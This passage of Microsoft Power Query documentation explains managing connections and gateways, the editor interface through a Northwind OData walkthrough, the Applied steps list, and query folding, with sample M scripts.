and choose data source lists by using one of the following generic data interfaces:
ODBC
OLE DB
OData
REST APIs
R Scripts
By providing the appropriate parameters in the connection windows that these generic
interfaces provide, the world of data sources you can access and use in Power Query
grows significantly.
In the following sections, you can find lists of data sources that can be accessed by
these generic interfaces.
Note
This feature is currently available only in Power Query Online and is in public
preview.
With Power Query, you can connect to a multitude of data sources. When you connect
to a data source, you fundamentally create a connection to it. This connection consists
of your data source, credentials, and more information, such as privacy levels and
optional parameters for each data source. The Manage connections dialog is one
centralized way in your Power Query project to manage the connections that are being
referenced by your project.
The entry to the Manage connections dialog is available in the Power Query Home tab
in the ribbon's Data sources group.
Manage connections displays a list of all connections being referenced in your Power Query project. It also lets you unlink or edit any of the connections in your project.
Unlink a connection
Right next to the name of the connection, and before the Source type column, there's an icon to unlink the connection.
When you unlink a connection, you're simply removing the reference of the connection
from your project. Unlinking means that the definition of the connection isn't removed
from the back-end, but it can't be used in your project.
A new prompt then asks you to confirm that you want to unlink the connection.
Note
If you want to delete a connection from within a specific product integration, such
as Microsoft Power BI or Microsoft Fabric, be sure to check out the documentation
for each product on how a centralized connections portal can be used.
Edit a connection
Right next to the name of the connection, and before the unlink icon, there's an icon to edit the connection.
Data gateway: If your data source uses a data gateway, you can modify the
gateway using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, and fields where you enter your credentials.
More Resources
Get Data experience in Power Query
Connectors available in Power Query
Change the gateway used in a dataflow project
Article • 05/25/2023
When creating a new dataflow project in Power Query Online, you can select the on-
premises data gateway used for your specific data sources during the get data
experience. This article showcases how you can modify or assign a gateway to an
existing dataflow project.
Note
Before being able to change a gateway, make sure that you have the needed
gateways already registered under your tenant and with access for the authors of
the dataflow project. You can learn more about data gateways from Using an on-
premises data gateway in Power Platform dataflows.
This query previously used a gateway named "Gateway A" to connect to the folder. But
"Gateway A" no longer has access to the folder due to new company policies. A new
gateway named "Gateway B" has been registered and now has access to the folder that
the query requires. The goal is to change the gateway used in this dataflow project so it
uses the new "Gateway B".
Tip
If there were recent changes to your gateways, select the small refresh icon to
the right of the drop-down menu to update the list of available gateways.
3. After selecting the correct gateway for the project, in this case Gateway B, select
OK to go back to the Power Query editor.
Note
The M engine identifies a data source using a combination of its kind and path.
The kind defines what connector or data source function is being used, such as SQL
Server, folder, Excel workbook, or others.
The path value is derived from the required parameters of your data source
function and, for this example, that would be the folder path.
The best way to validate the data source path is to go into the query where your data
source function is being used and check the parameters being used for it. For this
example, there's only one query that connects to a folder and this query has the Source
step with the data source path defined in it. You can double-click the Source step to get
the dialog that indicates the parameters used for your data source function. Make sure
that the folder path, or the correct parameters for your data source function, is the
correct one in relation to the gateway being used.
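For instance, a query that connects to a folder typically has a Source step similar to the following sketch; the folder path passed to Folder.Files is the data source path that the selected gateway must be able to reach (the path shown is a placeholder):
Power Query M
let
    // The folder path is the data source path that the gateway needs access to
    Source = Folder.Files("\\fileserver\shared\SalesData")
in
    Source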
Modify authentication
To modify the credentials used against your data source, select Get data in the Power
Query editor ribbon to launch the Choose data source dialog box, then define a new or
existing connection to your data source. In this example, the connector that's used is the
Folder connector.
Once in Connection settings, create a new connection or select or modify a different
connection for your data source.
After defining the connection details, select Next at the bottom-right corner and
validate that your query is loading in the Power Query editor.
Note
This process is the same as if you were to connect again to your data source. But by
doing the process again, you're effectively re-defining what authentication method
and credentials to use against your data source.
The Power Query user interface
Article • 04/10/2023
With Power Query, you can connect to many different data sources and transform the
data into the shape you want.
In this article, you'll learn how to create queries with Power Query.
If you're new to Power Query, you can sign up for a free trial of Power BI before you
begin. You can use Power BI dataflows to try out the Power Query Online experiences
described in this article.
Examples in this article connect to and use the Northwind OData feed .
https://services.odata.org/V4/Northwind/Northwind.svc/
Note
To learn more about where to get data from each of the Microsoft products that
include Power Query, go to Where to get data.
To start, locate the OData feed connector from the "Get Data" experience. You can select
the Other category from the top, or search for OData in the search bar in the top-right
corner.
Once you select this connector, the screen displays the connection settings and
credentials.
For URL, enter the URL to the Northwind OData feed shown in the previous
section.
For On-premises data gateway, leave as none.
For Authentication kind, leave as anonymous.
The Navigator now opens, where you select the tables you want to connect to from the
data source. Select the Customers table to load a preview of the data, and then select
Transform data.
The dialog then loads the data from the Customers table into the Power Query editor.
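Behind the scenes, the query created by this get data experience looks roughly like the following sketch (the navigation step is shown in a simplified form):
Power Query M
let
    // Connect to the public Northwind OData feed used throughout this article
    Source = OData.Feed("https://services.odata.org/V4/Northwind/Northwind.svc/"),
    // Navigate to the Customers table selected in the Navigator
    Customers = Source{[Name = "Customers"]}[Data]
in
    Customers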
The above experience of connecting to your data, specifying the authentication method,
and selecting the specific object or table to connect to is called the get data experience
and is documented with further detail in the Getting data article.
The Power Query editor user interface consists of the following components:
1. Ribbon: the ribbon navigation experience, which provides multiple tabs to add
transforms, select options for your query, and access different ribbon buttons to
complete various tasks.
2. Queries pane: a view of all your available queries.
3. Current view: your main working view, that by default, displays a preview of the
data for your query. You can also enable the diagram view along with the data
preview view. You can also switch between the schema view and the data preview
view while maintaining the diagram view.
4. Query settings: a view of the currently selected query with relevant information,
such as query name, query steps, and various indicators.
5. Status bar: a bar displaying relevant important information about your query, such
as execution time, total columns and rows, and processing status. This bar also
contains buttons to change your current view.
Note
The schema and diagram view are currently only available in Power Query Online.
The ribbon
The ribbon is the component where you'll find most of the transforms and actions that
you can do in the Power Query editor. It has multiple tabs, whose contents depend on the product integration. Each of the tabs provides specific buttons and options, some of
which might be redundant across the whole Power Query experience. These buttons and
options provide you with easy access to the transforms and actions that you may need.
The Power Query interface is responsive and tries to adjust to your screen resolution to show you the best experience. In scenarios where you'd like to use a compact version of the ribbon, there's also a collapse button at the bottom-right corner of the ribbon to help you switch to the compact ribbon.
You can switch back to the standard ribbon view by selecting the expand icon at the bottom-right corner of the ribbon.
You're encouraged to try all of these options to find the view and layout that you feel
most comfortable working with. As an example, select Schema view from the ribbon.
The right side of the status bar also contains icons for the diagram, data, and schema
views. You can use these icons to change between views. You can also use these icons to
enable or disable the view of your choice.
For example, in schema view, select the check mark next to the Orders and
CustomerDemographics columns, and from the ribbon select the Remove columns
action. This selection applies a transformation to remove these columns from your data.
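The step added for this action would look like the following sketch, where the inline table is only a small stand-in for the Customers query:
Power Query M
let
    // Small stand-in for the Customers query; the real table has many more columns and rows
    Customers = #table({"CustomerID", "Country", "Orders", "CustomerDemographics"}, {{"ALFKI", "Germany", null, null}}),
    // Step generated by the Remove columns action in schema view
    #"Removed Columns" = Table.RemoveColumns(Customers, {"Orders", "CustomerDemographics"})
in
    #"Removed Columns"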
Next, open the Group by dialog and set it to group by the Country column and count the number of customer rows per country.
Select OK to perform the operation. Your data preview refreshes to show the total
number of customers by country.
An alternative way to launch the Group by dialog would be to use the Group by button
in the ribbon or by right-clicking the Country column.
For convenience, transforms in Power Query can often be accessed from multiple places,
so users can opt to use the experience they prefer.
First, you'll need to add the Suppliers data. Select Get Data, and then select OData from the drop-down menu.
The OData connection experience reappears. Enter the connection settings as described
in Connect to an OData feed to connect to the Northwind OData feed. In the Navigator
experience, search for and select the Suppliers table.
Select Create to add the new query to the Power Query editor. The queries pane should
now display both the Customers and the Suppliers query.
Open the Group by dialog again, this time by selecting the Group by button on the
ribbon under the Transform tab.
In the Group by dialog, set the Group by operation to group by the country and count
the number of supplier rows per country.
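The step this dialog generates is equivalent to a Table.Group call, sketched here over a small stand-in table (the real query operates on the Suppliers table from the feed):
Power Query M
let
    // Small stand-in for the Suppliers table
    Suppliers = #table({"SupplierID", "Country"}, {{1, "USA"}, {2, "USA"}, {3, "Japan"}}),
    // Group by Country and count the number of supplier rows per country
    #"Grouped Rows" = Table.Group(Suppliers, {"Country"}, {{"Suppliers", each Table.RowCount(_), Int64.Type}})
in
    #"Grouped Rows"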
Referencing queries
Now that you have a query for customers and a query for suppliers, your next goal is to
combine these queries into one. There are many ways to accomplish this, including
using the Merge option in the Customers table, duplicating a query, or referencing a
query. For this example, you'll create a reference by right-clicking the Customers table
and selecting Reference, which effectively creates a new query that references the
Customers query.
After creating this new query, change the name of the query to Country Analysis and disable the load of the Customers query by clearing its Enable load option.
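In M, a referencing query contains nothing more than a step that points at the referenced query (this sketch assumes a query named Customers exists in the same project):
Power Query M
let
    // The only step of the new Country Analysis query is a reference to the existing Customers query
    Source = Customers
in
    Source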
Merging queries
A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. In this example, the goal is to join both the Customers
and Suppliers tables into one table only for the countries that have both Customers and
Suppliers.
Inside the Country Analysis query, select the Merge queries option from the Home tab
in the ribbon.
A new dialog for the Merge operation appears. You can then select the query to merge
with your current query. Select the Suppliers query and select the Country field from
both queries. Finally, select the Inner join kind, as you only want the countries where
you have Customers and Suppliers for this analysis.
After selecting the OK button, a new column is added to your Country Analysis query
that contains the data from the Suppliers query. Select the icon next to the Suppliers
field, which displays a menu where you can select which fields you want to expand.
Select only the Suppliers field, and then select the OK button.
The result of this expand operation is a table with only 12 rows. Rename the
Suppliers.Suppliers field to just Suppliers by double-clicking the field name and
entering the new name.
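The following is a hedged sketch of the M that these Merge, expand, and rename
operations typically generate; the exact step names are assumptions based on the
description above.
Power Query M
let
    Source = Customers,
    // Inner join keeps only countries present in both queries
    #"Merged queries" = Table.NestedJoin(Source, {"Country"}, Suppliers, {"Country"}, "Suppliers", JoinKind.Inner),
    // Expand only the Suppliers field from the nested table column
    #"Expanded Suppliers" = Table.ExpandTableColumn(#"Merged queries", "Suppliers", {"Suppliers"}, {"Suppliers.Suppliers"}),
    // Rename the expanded column to just Suppliers
    #"Renamed columns" = Table.RenameColumns(#"Expanded Suppliers", {{"Suppliers.Suppliers", "Suppliers"}})
in
    #"Renamed columns"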
7 Note
To learn more about the Merge queries feature, go to Merge queries overview.
Applied steps
Every transformation that is applied to your query is saved as a step in the Applied
steps section of the query settings pane. If you ever need to check how your query is
transformed from step to step, you can select a step and preview how your query
resolves at that specific point.
You can also right-click a step and select the Properties option to change the name of
the step or add a description for it. For example, right-click the Merge queries step in
the Country Analysis query and change the name of the step to Merge with Suppliers
and the description to Getting data from the Suppliers query for Suppliers by Country.
This change adds a new icon next to your step that you can hover over to read its
description.
7 Note
To learn more about Applied steps, go to Using the Applied Steps list.
Before moving on to the next section, disable the Diagram view to only use the Data
preview.
Adding a new column
With the data for customers and suppliers in a single table, you can now calculate the
ratio of customers-to-suppliers for each country. Select the last step of the Country
Analysis query, and then select both the Customers and Suppliers columns. In the Add
column tab in the ribbon and inside the From number group, select Standard, and then
Divide (Integer) from the dropdown.
This change creates a new column called Integer-division that you can rename to Ratio.
This change is the final step of your query, and provides the customer-to-supplier ratio
for the countries where the data has customers and suppliers.
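As a minimal sketch of what this Add column operation generates, the following uses
Number.IntegerDivide to build the new column and then renames it to Ratio; the inline
sample table and its values are illustrative stand-ins for the Merge with Suppliers output,
not data from this article.
Power Query M
let
    // Illustrative stand-in for the output of the Merge with Suppliers step
    #"Merge with Suppliers" = Table.FromRecords({
        [Country = "Germany", Customers = 11, Suppliers = 3],
        [Country = "France", Customers = 11, Suppliers = 3]
    }),
    // Divide (Integer) from the Add column tab generates an integer-division column
    #"Inserted integer division" = Table.AddColumn(#"Merge with Suppliers", "Integer-division",
        each Number.IntegerDivide([Customers], [Suppliers]), Int64.Type),
    // Rename the generated column to Ratio
    #"Renamed columns" = Table.RenameColumns(#"Inserted integer division", {{"Integer-division", "Ratio"}})
in
    #"Renamed columns"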
Data profiling
Another Power Query feature that can help you better understand your data is Data
Profiling. By enabling the data profiling features, you'll get feedback about the data
inside your query fields, such as value distribution, column quality, and more.
We recommend that you use this feature throughout the development of your
queries, but you can always enable and disable the feature at your convenience. The
following image shows all the data profiling tools enabled for your Country Analysis
query.
7 Note
To learn more about Data profiling, go to Using the data profiling tools.
To access the inline Power Query help information in Excel, select the Help tab on the
Excel ribbon, and then enter Power Query in the search text box.
7 Note
Currently, Azure Analysis Services doesn't contain any inline Power Query help links.
However, you can get help for Power Query M functions. More information is
contained in the next section.
1. With the Power Query editor open, select the insert step button.
2. In the formula bar, enter the name of a function you want to check.
a. If you are using Power Query Desktop, enter an equal sign, a space, and the
name of a function.
b. If you are using Power Query Online, enter the name of a function.
3. Select the properties of the function.
a. If you are using Power Query Desktop, in the Query Settings pane, under
Properties, select All properties.
b. If you are using Power Query Online, in the Query Settings pane, select
Properties.
These steps will open the inline help information for your selected function, and let you
enter individual properties used by the function.
Summary
In this article, you created a series of queries with Power Query that provides a
customer-to-supplier ratio analysis at the country level for the Northwind corporation.
You learned the components of the Power Query user interface, how to create new
queries inside the query editor, reference queries, merge queries, understand the
applied steps section, add new columns, and how to use the data profiling tools to
better understand your data.
Power Query is a powerful tool used to connect to many different data sources and
transform the data into the shape you want. The scenarios outlined in this article are
examples to show you how you can use Power Query to transform raw data into
important actionable business insights.
Using the Applied Steps list
Article • 08/07/2023
The Applied steps list is part of the Query settings pane in Power Query. Any
transformation applied to your data is displayed in the Applied steps list. For instance, if you
change the first column name, the new column name is displayed in the Applied steps
list as Renamed columns.
Selecting any step displays the results of that particular step, so you can see exactly how
your data changes as you add steps to the query.
If you're using Power Query Desktop (Excel, Power BI Desktop, Analysis Services) and the
Query Settings pane is closed, select the View tab from the ribbon, and then select
Query Settings.
The Query Settings pane then opens on the right side with the Applied Steps list.
If you're using Power Query Online (Power BI service, Power Apps, Data Factory
(preview), Microsoft 365 Customer Insights) and the Query settings pane is closed,
select the < icon above Query settings to open the pane.
The Query settings pane then opens on the right side with the Applied steps list.
The following image shows the different parts of the Applied steps list. Currently, not all
of these parts are found in Power Query Desktop. The Applied steps list in Power Query
Desktop only contains the delete step, step name, step description, and step settings
elements. The step icon and query folding indicator are found only in Power Query
Online.
In Power Query Online, if you hover the mouse cursor over one of the applied steps, an
informational display opens, listing the step name, step label, step description, step
settings, information about the step query folding, and a learn more link to the Query
folding indicators article. For more information about query folding, go to Power Query
query folding. The step label is automatically generated when the step is created, and
indicates the step type, as does the step icon. The step label and the step icon can't be
changed.
You can also edit the settings for any step that contains the step settings icon. The icon
appears in two places: in the Applied steps list, and in the informational display for the
step. Just select the icon, and the settings page for that particular step is displayed.
Rename step
To rename a step, right-click the step and select Rename.
Enter the name you want, and then either press Enter or select away from the step.
Delete step
To delete a step, right-click the step and select Delete.
Alternatively, select the X next to the step.
Delete until end
To delete a series of steps, right-click the first step of the series and select Delete until
end. This action deletes the selected step and all the subsequent steps.
Select Delete in the new window.
The following image shows the Applied steps list after using the Delete until end.
Insert step after
To add a new step, right-click on the last step in the list and select Insert step after.
To insert a new intermediate step, right-click a step and select Insert step after. Then
select Insert in the new window.
To set a transformation for the new step, select the new step in the list and make the
change to the data. It automatically links the transformation to the selected step.
Move step
To move a step up one position in the list, right-click the step and select Move before.
To move a step down one position in the list, right-click the step and select Move after.
Alternatively, or to move more than a single position, drag and drop the step to the
desired location.
Extract the previous steps into query
You can also separate a series of transformations into a different query. This allows the
query to be referenced for other sources, which can be helpful if you're trying to apply
the same transformation to multiple datasets. To extract all the previous steps into a
new query, right-click the first step you do not want to include in the query and select
Extract Previous.
Name the new query and select OK. To access the new query, navigate to the Queries
pane on the left side of the screen.
Global search box (Preview)
Article • 07/30/2022
The global search box offers you the ability to search for queries in your project, actions
available in the editor, and get data connectors.
The global search box is located at the top center of the Power Query editor. The search
box follows the same design principles that you find in Microsoft Search in Office , but
contextualized to Power Query.
Search results
To make use of the global search box, select the search box or press Alt + Q. Before you
enter anything, you'll be presented with some default options to choose from.
When you start entering something to search for, the results will be updated in real
time, displaying queries, actions, and get data connectors that match the text that
you've entered.
For scenarios where you'd like to see all available options for a given search query, you
can also select the See more results for option. This option is positioned as the last
result of the search box query when there are multiple matches to your query.
Overview of query evaluation and query
folding in Power Query
Article • 02/17/2023
This article provides a basic overview of how M queries are processed and turned into
data source requests.
Tip
You can think of the M script as a recipe that describes how to prepare your data.
The most common way to create an M script is by using the Power Query editor. For
example, when you connect to a data source, such as a SQL Server database, you'll
notice on the right-hand side of your screen that there's a section called applied steps.
This section displays all the steps or transforms used in your query. In this sense, the
Power Query editor serves as an interface to help you create the appropriate M script for
the transforms that you're after, and ensures that the code you use is valid.
7 Note
The Power Query editor also displays the query as a series of steps, allows the creation
or modification of steps, and can display a diagram view.
The previous image emphasizes the applied steps section, which contains the following
steps:
Source: Makes the connection to the data source. In this case, it's a connection to a
SQL Server database.
Navigation: Navigates to a specific table in the database.
Removed other columns: Selects which columns from the table to keep.
Sorted rows: Sorts the table using one or more columns.
Kept top rows: Filters the table to only keep a certain number of rows from the top
of the table.
This set of step names is a friendly way to view the M script that Power Query has
created for you. There are several ways to view the full M script. In Power Query, you can
select Advanced Editor in the View tab. You can also select Advanced Editor from the
Query group in the Home tab. In some versions of Power Query, you can also change
the view of the formula bar to show the query script by going into the View tab and
from the Layout group, select Script view > Query script.
Most of the names found in the Applied steps pane are also used as-is in the M
script. Steps of a query are named using something called identifiers in the M language.
Sometimes extra characters are wrapped around step names in M, but these characters
aren’t shown in the applied steps. An example is #"Kept top rows" , which is categorized
as a quoted identifier because of these extra characters. A quoted identifier can be used
to allow any sequence of zero or more Unicode characters to be used as an identifier,
including keywords, whitespace, comments, operators, and punctuators. To learn more
about identifiers in the M language, go to lexical structure.
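To make the distinction concrete, here's a small illustrative query (not from this article)
showing a regular identifier next to a quoted identifier; the table contents are arbitrary.
Power Query M
let
    Source = Table.FromRecords({[OrderID = 1], [OrderID = 2], [OrderID = 3]}),
    // A step name without spaces can be a regular identifier
    KeptRows = Table.FirstN(Source, 2),
    // A step name with spaces must be a quoted identifier
    #"Kept top rows" = Table.FirstN(KeptRows, 1)
in
    #"Kept top rows"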
Any changes that you make to your query through the Power Query editor will
automatically update the M script for your query. For example, using the previous image
as the starting point, if you change the Kept top rows step name to be Top 20 rows, this
change will automatically be updated in the script view.
While we recommend that you use the Power Query editor to create all or most of the
M script for you, you can manually add or modify pieces of your M script. To learn more
about the M language, go to the official docs site for the M language.
7 Note
M script, also referred to as M code, is a term used for any code that uses the M
language. In the context of this article, M script also refers to the code found inside
a Power Query query and accessible through the advanced editor window or
through the script view in the formula bar.
7 Note
While this example showcases a query with a SQL Database as a data source, the
concept applies to queries with or without a data source.
When Power Query reads your M script, it runs the script through an optimization
process to more efficiently evaluate your query. In this process, it determines which
steps (transforms) from your query can be offloaded to your data source. It also
determines which other steps need to be evaluated using the Power Query engine. This
optimization process is called query folding, where Power Query tries to push as much of
the possible execution to the data source to optimize your query's execution.
) Important
All rules from the Power Query M formula language (also known as the M
language) are followed. Most notably, lazy evaluation plays an important role
during the optimization process. In this process, Power Query understands what
specific transforms from your query need to be evaluated. Power Query also
understands what other transforms don't need to be evaluated because they're not
needed in the output of your query.
Furthermore, when multiple sources are involved, the data privacy level of each
data source is taken into consideration when evaluating the query. More
information: Behind the scenes of the Data Privacy Firewall
The following diagram demonstrates the steps that take place in this optimization
process.
1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also supplied, such as credentials and data
source privacy levels.
2. The Query folding mechanism submits metadata requests to the data source to
determine the capabilities of the data source, table schemas, relationships between
different entities at the data source, and more.
3. Based on the metadata received, the query folding mechanism determines what
information to extract from the data source and what set of transformations need
to happen inside the Power Query engine. It sends the instructions to two other
components that take care of retrieving the data from the data source and
transforming the incoming data in the Power Query engine if necessary.
4. Once the instructions have been received by the internal components of Power
Query, Power Query sends a request to the data source using a data source query.
5. The data source receives the request from Power Query and transfers the data to
the Power Query engine.
6. Once the data is inside Power Query, the transformation engine inside Power
Query (also known as mashup engine) does the transformations that couldn't be
folded back or offloaded to the data source.
7. The results derived from the previous point are loaded to a destination.
7 Note
Depending on the transformations and data source used in the M script, Power
Query determines if it will stream or buffer the incoming data.
The query folding mechanism accomplishes this goal by translating your M script to a
language that can be interpreted and executed by your data source. It then pushes the
evaluation to your data source and sends the result of that evaluation to Power Query.
This operation often provides a much faster query execution than extracting all the
required data from your data source and running all transforms required in the Power
Query engine.
When you use the get data experience, Power Query guides you through the process
that ultimately lets you connect to your data source. When doing so, Power Query uses
a series of functions in the M language categorized as accessing data functions. These
specific functions use mechanisms and protocols to connect to your data source using a
language that your data source can understand.
However, the steps that follow in your query are the steps or transforms that the query
folding mechanism attempts to optimize. It then checks if they can be offloaded to your
data source instead of being processed using the Power Query engine.
) Important
All data source functions, commonly shown as the Source step of a query, query
the data at the data source in its native language. The query folding mechanism is
applied to all transforms that follow your data source function so that they can be
translated and combined into a single data source query, or into as many transforms
as can be offloaded to the data source.
Depending on how the query is structured, there are three possible outcomes of
the query folding mechanism:
Full query folding: When all of your query transformations get pushed back to the
data source and minimal processing occurs at the Power Query engine.
Partial query folding: When only a few transformations in your query, and not all,
can be pushed back to the data source. In this case, only a subset of your
transformations is done at your data source and the rest of your query
transformations occur in the Power Query engine.
No query folding: When the query contains transformations that can't be
translated to the native query language of your data source, either because the
transformations aren't supported or the connector doesn't support query folding.
For this case, Power Query gets the raw data from your data source and uses the
Power Query engine to achieve the output you want by processing the required
transforms at the Power Query engine level.
7 Note
Leveraging a data source that has more processing resources and has query folding
capabilities can expedite your query loading times as the processing occurs at the
data source and not at the Power Query engine.
Next steps
For detailed examples of the three possible outcomes of the query folding mechanism,
go to Query folding examples.
For information about query folding indicators found in the Applied Steps pane, go to
Query folding indicators
Power Query query folding
Article • 08/31/2022
This article targets data modelers developing models in Power Pivot or Power BI
Desktop. It describes what Power Query query folding is, and why it's important in your
data model designs. This article also describes the data sources and transformations that
can achieve query folding, and how to determine that your Power Query queries can be
folded—whether fully or partially.
Query folding is the ability for a Power Query query to generate a single query
statement to retrieve and transform source data. The Power Query mashup engine
strives to achieve query folding whenever possible for reasons of efficiency.
Query folding is an important topic for data modeling for several reasons:
Import model tables: Data refresh will take place efficiently for Import model
tables (Power Pivot or Power BI Desktop), in terms of resource utilization and
refresh duration.
DirectQuery and Dual storage mode tables: Each DirectQuery and Dual storage
mode table (Power BI only) must be based on a Power Query query that can be
folded.
Incremental refresh: Incremental data refresh (Power BI only) will be efficient, in
terms of resource utilization and refresh duration. In fact, the Power BI Incremental
Refresh configuration window displays a warning if it determines that query folding
for the table can't be achieved. If it can't be achieved, the goal of
incremental refresh is defeated. The mashup engine would then be required to
retrieve all source rows, and then apply filters to determine incremental changes.
Query folding may occur for an entire Power Query query, or for a subset of its steps.
When query folding cannot be achieved—either partially or fully—the Power Query
mashup engine must compensate by processing data transformations itself. This process
can involve retrieving source query results, which for large datasets is very resource
intensive and slow.
We recommend that you strive to achieve efficiency in your model designs by ensuring
query folding occurs whenever possible.
Generally, the following list describes transformations that can be query folded.
Removing columns.
Filtering rows, with static values or Power Query parameters (WHERE clause
predicates).
Expanding record columns (source foreign key columns) to achieve a join of two
source tables (JOIN clause).
Non-fuzzy merging of fold-able queries based on the same source (JOIN clause).
Appending fold-able queries based on the same source (UNION ALL operator).
Adding custom columns with simple logic (SELECT column expressions). Simple
logic implies uncomplicated operations, possibly including the use of M functions
that have equivalent functions in the SQL data source, like mathematic or text
manipulation functions. For example, the following expression returns the year
component of the OrderDate column value (as a numeric value).
Power Query M
Date.Year([OrderDate])
Adding custom columns with complex logic, by contrast, generally prevents query
folding. Complex logic implies the use of M functions that have no equivalent functions
in the data source. For example, the following expression formats the OrderDate
column value (to return a text value).
Power Query M
Date.ToText([OrderDate], "yyyy")
Note that when a Power Query query encompasses multiple data sources,
incompatibility of data source privacy levels can prevent query folding from taking
place. For more information, see the Power BI Desktop privacy levels article.
The View Native Query option is only available for certain relational DB/SQL
generating connectors. It doesn't work for OData based connectors, for example,
even though there is folding occurring on the backend. The Query Diagnostics
feature is the best way to see what folding has occurred for non-SQL connectors
(although the steps that fold aren't explicitly called out—you just see the resulting
URL that was generated).
To view the folded query, select the View Native Query option. You're then
presented with the native query that Power Query uses to source the data.
If the View Native Query option isn't enabled (greyed out), this is evidence that not all
query steps can be folded. However, it could mean that a subset of steps can still be
folded. Working backwards from the last step, you can check each step to see if the
View Native Query option is enabled. If so, then you've learned where, in the sequence
of steps, query folding could no longer be achieved.
Next steps
For more information about query folding, see the related articles on query folding
examples and query folding indicators.
Query folding examples
This article provides some example scenarios for each of the three possible outcomes
for query folding. It also includes some suggestions on how to get the most out of the
query folding mechanism, and the effect that it can have in your queries.
The scenario
Imagine a scenario where, using the Wide World Importers database for Azure Synapse
Analytics SQL database, you're tasked with creating a query in Power Query that
connects to the fact_Sale table and retrieves the last 10 sales with only the following
fields:
Sale Key
Customer Key
Invoice Date Key
Description
Quantity
7 Note
For demonstration purposes, this article uses the database outlined on the tutorial
on loading the Wide World Importers database into Azure Synapse Analytics. The
main difference in this article is the fact_Sale table only holds data for the year
2000, with a total of 3,644,356 rows.
While the results might not exactly match the results that you get by following the
tutorial from the Azure Synapse Analytics documentation, the goal of this article is
to showcase the core concepts and impact that query folding can have in your
queries.
This article showcases three ways to achieve the same output with different levels of
query folding:
No query folding
Partial query folding
Full query folding
) Important
Queries that rely solely on unstructured data sources or that don't have a compute
engine, such as CSV or Excel files, don't have query folding capabilities. This means
that Power Query evaluates all the required data transformations using the Power
Query engine.
No query folding example
After connecting to your database and navigating to the fact_Sale table, you select the
Keep bottom rows transform found inside the Reduce rows group of the Home tab.
After selecting this transform, a new dialog appears. In this new dialog, you can enter
the number of rows that you'd like to keep. For this case, enter the value 10, and then
select OK.
Tip
For this case, performing this operation yields the result of the last ten sales. In
most scenarios, we recommend that you provide a more explicit logic that defines
which rows are considered last by applying a sort operation on the table.
Next, select the Choose columns transform found inside the Manage columns group of
the Home tab. You can then select the columns you want to keep from your table and
remove the rest.
Lastly, inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice
Date Key , Description , and Quantity columns, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Kept bottom rows" = Table.LastN(Navigation, 10),
#"Choose columns" = Table.SelectColumns(#"Kept bottom rows", {"Sale Key",
"Customer Key", "Invoice Date Key", "Description", "Quantity"})
in
#"Choose columns""
To review how this query is evaluated, you can right-click the last step of the query and
select the Query plan option. Each box in the query plan is called a node. A node
represents the operation breakdown to fulfill this query. Nodes that represent data
sources, such as SQL Server in the example above, and the Value.NativeQuery node,
represent which part of the query
is offloaded to the data source. The rest of the nodes, in this case Table.LastN and
Table.SelectColumns highlighted in the rectangle in the previous image, are evaluated
by the Power Query engine. These two nodes represent the two transforms that you
added, Kept bottom rows and Choose columns. The rest of the nodes represent
operations that happen at your data source level.
To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This data source request is in the native language of your data source. For this case, that
language is SQL and this statement represents a request for all the rows and fields from
the fact_Sale table.
Consulting this data source request can help you better understand the story that the
query plan tries to convey:
Sql.Database : This node represents the data source access. Connects to the
database and sends metadata requests to understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. In this case, that represents all records and fields (columns)
from the fact_Sale table. For this scenario, this case is undesirable, as the table
contains millions of rows and the interest is only in the last 10.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.
Table.SelectColumns : Power Query will use the output of the Table.LastN node
and apply a new transform called Table.SelectColumns , which selects the specific
columns that you want to keep from a table.
For its evaluation, this query had to download all rows and fields from the fact_Sale
table. This query took an average of 6 minutes and 1 second to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Partial query folding example
After connecting to the database and navigating to the fact_Sale table, select the
Choose columns transform found inside the Manage columns group of the Home tab.
Inside the Choose columns dialog, select the Sale Key, Customer Key, Invoice Date
Key, Description, and Quantity columns, and then select OK.
You now create logic that will sort the table to have the last sales at the bottom of the
table. Select the Sale Key column, which is the primary key and incremental sequence
or index of the table. Sort the table using only this field in ascending order from the
context menu for the column.
Next, select the table contextual menu and choose the Keep bottom rows transform.
In Keep bottom rows, enter the value 10, and then select OK.
The following code sample is the full M script for the query you created:
Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Ascending}}),
#"Kept bottom rows" = Table.LastN(#"Sorted rows", 10)
in
#"Kept bottom rows"
You can right-click the last step of your query, the one named Kept bottom rows , and
select the Query plan option to better understand how your query might be evaluated.
Each box in the previous image is called a node. A node represents every process that
needs to happen (from left to right) in order for your query to be evaluated. Some of
these nodes can be evaluated at your data source while others, like the node for
Table.LastN , represented by the Kept bottom rows step, are evaluated using the Power
Query engine.
To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows, with only the requested
fields from the fact_Sale table ordered by the Sale Key field.
Consulting this data source request can help you better understand the story that the
full query plan tries to convey. The order of the nodes is a sequential process that starts
by requesting the data from your data source:
For its evaluation, this query had to download all rows and only the required fields from
the fact_Sale table. It took an average of 3 minutes and 4 seconds to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Full query folding example
After connecting to the database and navigating to the fact_Sale table, start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.
In Choose columns, select the Sale Key , Customer Key , Invoice Date Key , Description ,
and Quantity columns, and then select OK.
You now create logic that will sort the table to have the last sales at the top of the table.
Select the Sale Key column, which is the primary key and incremental sequence or
index of the table. Sort the table only using this field in descending order from the
context menu for the column.
